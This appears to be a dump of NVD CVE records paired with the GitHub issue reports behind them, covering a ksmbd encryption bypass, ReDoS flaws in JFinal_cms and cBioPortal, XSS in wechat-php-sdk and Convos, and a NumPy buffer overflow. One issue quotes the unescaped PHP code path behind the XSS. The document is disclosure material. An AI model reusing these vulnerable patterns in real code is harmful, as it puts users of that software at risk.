https://api.github.com/repos/xwlrbh/Catfish/issues/9/comments
0
2021-12-12T03:28:22Z
2021-12-12T03:28:22Z
https://github.com/xwlrbh/Catfish/issues/9
1,077,707,440
9
2,865
CVE-2021-45100
2021-12-16T05:15:08.827
The ksmbd server through 3.4.2, as used in the Linux kernel through 5.15.8, sometimes communicates in cleartext even though encryption has been enabled. This occurs because it sets the SMB2_GLOBAL_CAP_ENCRYPTION flag when using the SMB 3.1.1 protocol, which is a violation of the SMB protocol specification. When Windows 10 detects this protocol violation, it disables encryption.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cifsd-team/ksmbd/issues/550" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cifsd-team/ksmbd/pull/551" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://marc.info/?l=linux-kernel&m=163961726017023&w=2" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220107-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cifsd-team/ksmbd/issues/550" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cifsd-team/ksmbd/pull/551" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://marc.info/?l=linux-kernel&m=163961726017023&w=2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220107-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ksmbd_project:ksmbd:*:*:*:*:*:*:*:*", "matchCriteriaId": "390574D7-AB21-4856-8AA4-A5DFFEA207E0", "versionEndExcluding": null, "versionEndIncluding": "3.4.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "8173A5D6-121D-4B12-9C0C-593FA8C29479", "versionEndExcluding": null, "versionEndIncluding": "5.15.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDDF61B7-EC5C-467C-B710-B89F502CD04F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6770B6C3-732E-4E22-BF1C-2D2FD610061C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F9C8C20-42EB-4AB5-BD97-212DEB070C43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FFF7106-ED78-49BA-9EC5-B889E3685D53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*", "matchCriteriaId": "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "56409CEC-5A1E-4450-AA42-641E459CC2AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*", "matchCriteriaId": "B06F4839-D16A-4A61-9BB5-55B13F41E47F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "108A2215-50FB-4074-94CF-C130FA14566D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*", "matchCriteriaId": "7AFC73CE-ABB9-42D3-9A71-3F5BC5381E0E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "32F0B6C0-F930-480D-962B-3F4EFDCC13C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*", "matchCriteriaId": "803BC414-B250-4E3A-A478-A3881340D6B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0FEB3337-BFDE-462A-908B-176F92053CEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*", "matchCriteriaId": "736AEAE9-782B-4F71-9893-DED53367E102", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0B4AD8A-F172-4558-AEC6-FF424BA2D912", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*", "matchCriteriaId": "8497A4C9-8474-4A62-8331-3FE862ED4098", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "319" ]
319
https://github.com/cifsd-team/ksmbd/issues/550
[ "Third Party Advisory" ]
github.com
[ "cifsd-team", "ksmbd" ]
Hello. I am facing an error with the latest stable v3.4.2 version, running on an OpenWRT machine. My configuration file is as follows: ``` [global] netbios name = wd-casa server string = Ksmbd on OpenWrt workgroup = WORKGROUP ipc timeout = 20 deadtime = 15 smb2 max read = 64K smb2 max write = 64K smb2 max trans = 64K smb3 encryption = yes restrict anonymous = 1 server signing = required server min protocol = SMB3_11 ######### Dynamic written config options ######### [marcos] path = /mnt/data/marcos force user = root force group = root create mask = 0666 directory mask = 0777 read only = no guest ok = no ``` Despite "smb3 encryption" set to yes, communications are still being made in plain text according to Wireshark. During the initial negotiation, both the client (a Windows 10 machine running 21H1, compilation 19043.1348) and the server agree on using 3.1.1 and AES-128-GCM: ![imagen](https://user-images.githubusercontent.com/515068/146107133-d8158304-8f0d-424e-98d6-38292133db89.png) On the the session setup request, however, the client decides to no longer flag it supports encryption, and thus request a plain text connection for unknown reasons: ![imagen](https://user-images.githubusercontent.com/515068/146107359-9488c0bf-72ae-4927-9f44-cb1bc978313c.png) Worse is, ksmbd agrees and goes on, ignoring the request to enforce encryption and just sending data on plain. The following screenshot displays a plain text ASCII message from opening a file which shouldn't be visible: ![imagen](https://user-images.githubusercontent.com/515068/146106835-73b1b756-bf09-48b8-a5ce-4d8959b4324c.png) I am not sure if being made in plain text is an error on the Windows side or not, but at the very least ksmbd should probably deny connections if the user requested encryption in the settings. Attached here is a .zip file with a Wireshark log of the entire packet exchange, from the initial connection to the desconnection: [comms.zip](https://github.com/cifsd-team/ksmbd/files/7715862/comms.zip)
Plaintext connection despite encryption enabled
https://api.github.com/repos/cifsd-team/ksmbd/issues/550/comments
8
2021-12-15T01:44:51Z
2021-12-16T13:08:55Z
https://github.com/cifsd-team/ksmbd/issues/550
1,080,469,469
550
2,866
CVE-2021-37262
2021-12-16T19:15:08.043
JFinal_cms 5.1.0 is vulnerable to regex injection that may lead to Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/jflyfox/jfinal_cms/issues/23
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
I have tried to contact you by zcool321@sina.com and created https://github.com/jflyfox/jfinal_cms/issues/22 asking for the contact. Nobody replied. The JFinal_cms is vulnerable to regex injection that may lead to Denial of Service. User controlled `path` and `contextPath` are used to build and run a regex expression (first argument to replaceFirst): https://github.com/jflyfox/jfinal_cms/blob/1a9653264be5a2fcf3641ae2aa5f14fc188fd192/src/main/java/com/jflyfox/modules/filemanager/FileManager.java#L929-L949 Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side.
[SECURITY] Denial of service because of unsafe regex processing
https://api.github.com/repos/jflyfox/jfinal_cms/issues/23/comments
3
2021-06-10T19:40:20Z
2021-12-17T21:37:27Z
https://github.com/jflyfox/jfinal_cms/issues/23
917,802,283
23
2,867
CVE-2021-38244
2021-12-16T19:15:08.087
A regular expression denial of service (ReDoS) vulnerability exits in cbioportal 3.6.21 and older via a POST request to /ProteinArraySignificanceTest.json.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cBioPortal/cbioportal/issues/8680" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cBioPortal/cbioportal/pull/8751" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cBioPortal/cbioportal/issues/8680" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cBioPortal/cbioportal/pull/8751" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cbioportal_project:cbioportal:*:*:*:*:*:*:*:*", "matchCriteriaId": "3135898E-4C52-4F52-8C7A-6192530363FE", "versionEndExcluding": null, "versionEndIncluding": "3.6.21", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/cBioPortal/cbioportal/issues/8680
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cBioPortal", "cbioportal" ]
I have tried to contact you by cbioportal@cbio.mskcc.org and asked for any other email in https://github.com/cBioPortal/cbioportal/issues/8658. Nobody replied. The cBioPortal is vulnerable to regex injection that may lead to Denial of Service. User controlled `heatmap` and `alteration` are used to build and run a regex expression: https://github.com/cBioPortal/cbioportal/blob/e086d40f17ac037161677d5478a5dc5ec710bbd8/core/src/main/java/org/mskcc/cbio/portal/servlet/ProteinArraySignificanceTestJSON.java#L104-L106 The value end up in getAlteredCases https://github.com/cBioPortal/cbioportal/blob/e086d40f17ac037161677d5478a5dc5ec710bbd8/core/src/main/java/org/mskcc/cbio/portal/servlet/ProteinArraySignificanceTestJSON.java#L279-L282 Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side.
[SECURITY] Denial of service because of unsafe regex processing
https://api.github.com/repos/cBioPortal/cbioportal/issues/8680/comments
10
2021-06-10T19:32:01Z
2021-07-20T20:23:19Z
https://github.com/cBioPortal/cbioportal/issues/8680
917,785,038
8,680
2,868
CVE-2021-43678
2021-12-17T13:15:07.320
Wechat-php-sdk v1.10.2 is affected by a Cross Site Scripting (XSS) vulnerability in Wechat.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaoming13/wechat-php-sdk" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaoming13/wechat-php-sdk/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaoming13/wechat-php-sdk" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaoming13/wechat-php-sdk/issues/30" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wechat-php-sdk_project:wechat-php-sdk:1.10.2:*:*:*:*:*:*:*", "matchCriteriaId": "9F116A19-0C48-4A2C-9A4D-E1084AE23693", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gaoming13/wechat-php-sdk/issues/30
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gaoming13", "wechat-php-sdk" ]
Hello, I would like to report for XSS vulnerability. ## Vulnerability path File Wechat.php - Line 58 ```php public function serve(){ // Source in this method $this->checkParams(); // Sink in this method $this->accessAuth(); return $this->getMessage(); } ``` - Line 468 ```php private function checkParams(){ $this->signature = isset($_GET['signature']) && !empty($_GET['signature']) ? $_GET['signature'] : false; $this->timestamp = isset($_GET['timestamp']) && !empty($_GET['timestamp']) ? $_GET['timestamp'] : false; $this->nonce = isset($_GET['nonce']) && !empty($_GET['nonce']) ? $_GET['nonce'] : false; // The source with $_GET['echostr'] $this->echostr = isset($_GET['echostr']) && !empty($_GET['echostr']) ? $_GET['echostr'] : false; $this->encrypt_type = isset($_GET['encrypt_type']) && !empty($_GET['encrypt_type']) ? $_GET['encrypt_type'] : false; $this->msg_signature = isset($_GET['msg_signature']) && !empty($_GET['msg_signature']) ? $_GET['msg_signature'] : false; } ``` - Line 500 ```php private function accessAuth(){ if ($this->echostr !== false) { if (! $this->checkSignature()) { @error_log('[wechat-php-sdk]accessAuth Error.', 0); } // the sink exit($this->echostr); } } ```
Possible XSS vulnerability
https://api.github.com/repos/gaoming13/wechat-php-sdk/issues/30/comments
1
2021-11-11T13:57:38Z
2021-12-08T17:59:09Z
https://github.com/gaoming13/wechat-php-sdk/issues/30
1,051,007,091
30
2,869
CVE-2021-42584
2021-12-17T14:15:07.607
A Stored Cross Site Scripting (XSS) issue exists in Convos-Chat before 6.32.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://dev696.github.io/Writeup/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/convos-chat/convos/commit/14a3b1e98cd1a3211c0ef3d4f5ffdbc60baaca54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/convos-chat/convos/issues/623" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://dev696.github.io/Writeup/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/convos-chat/convos/commit/14a3b1e98cd1a3211c0ef3d4f5ffdbc60baaca54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/convos-chat/convos/issues/623" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:convos:convos:*:*:*:*:*:*:*:*", "matchCriteriaId": "43E94376-F903-4369-89A0-BE0B4818E555", "versionEndExcluding": "6.32", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/convos-chat/convos/issues/623
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "convos-chat", "convos" ]
I have identified a stored cross site scripting vulnerability in https://convos.chat/, below is the POC for your reference: POC: **(Redacted by jberger)** Reference Link: https://owasp.org/www-community/attacks/xss/
Vulnerability in https://convos.chat/
https://api.github.com/repos/convos-chat/convos/issues/623/comments
3
2021-10-12T19:56:57Z
2021-10-13T23:48:22Z
https://github.com/convos-chat/convos/issues/623
1,024,269,184
623
2,870
CVE-2021-33430
2021-12-17T19:15:07.500
A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service. NOTE: The vendor does not agree this is a vulneraility; In (very limited) circumstances a user may be able provoke the buffer overflow, the user is most likely already privileged to at least provoke denial of service by exhausting memory. Triggering this further requires the use of uncommon API (complicated structured dtypes), which is very unlikely to be available to an unprivileged user
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/18939" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/numpy/numpy/issues/18939" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:numpy:numpy:*:*:*:*:*:*:*:*", "matchCriteriaId": "850F12C4-29D8-4406-B851-8EA669B3F80E", "versionEndExcluding": null, "versionEndIncluding": "1.9.3", "versionStartExcluding": null, "versionStartIncluding": "1.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/numpy/numpy/issues/18939
[ "Exploit", "Third Party Advisory" ]
github.com
[ "numpy", "numpy" ]
<!-- Please describe the issue in detail here, and fill in the fields below --> ### Reproducing code example: **Snippet**: ``` PyArray_NewFromDescr_int(...., **int nd**,......) { ............... if (descr->subarray) { PyObject *ret; npy_intp **newdims**[2*NPY_MAXDIMS]; npy_intp *newstrides = NULL; **memcpy**(newdims, dims, nd*sizeof(npy_intp)); if (strides) { newstrides = newdims + NPY_MAXDIMS; **memcpy**(newstrides, strides, nd*sizeof(npy_intp)); } ........ } ``` ### Error message: When we run our analysis tool on NumPy, a potential buffer-overflow problem was reported. See details below: **File**: numpy/core/src/multiarray/ctors.c **Function**: PyArray_NewFromDescr_int **Details** in [description](https://github.com/Daybreak2019/IssueReport/blob/master/Numpy/case-9532/9532.png) Possible call path: **1**. array_new -> PyArray_NewFromDescr_int **2**. PyArray_Zeros -> PyArray_NewFromDescr_int **3**. array_fromfile -> PyArray_FromFile -> PyArray_NewFromDescr_int ### NumPy/Python version information: The main branch of NumPy
Potential buffer overflow in PyArray_NewFromDescr_int of ctors.c
https://api.github.com/repos/numpy/numpy/issues/18939/comments
4
2021-05-07T18:30:11Z
2021-05-11T19:39:32Z
https://github.com/numpy/numpy/issues/18939
879,503,496
18,939
2,871
CVE-2021-34141
2021-12-17T19:15:07.543
An incomplete string comparison in the numpy.core component in NumPy before 1.22.0 allows attackers to trigger slightly incorrect copying by constructing specific string objects. NOTE: the vendor states that this reported code behavior is "completely harmless."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
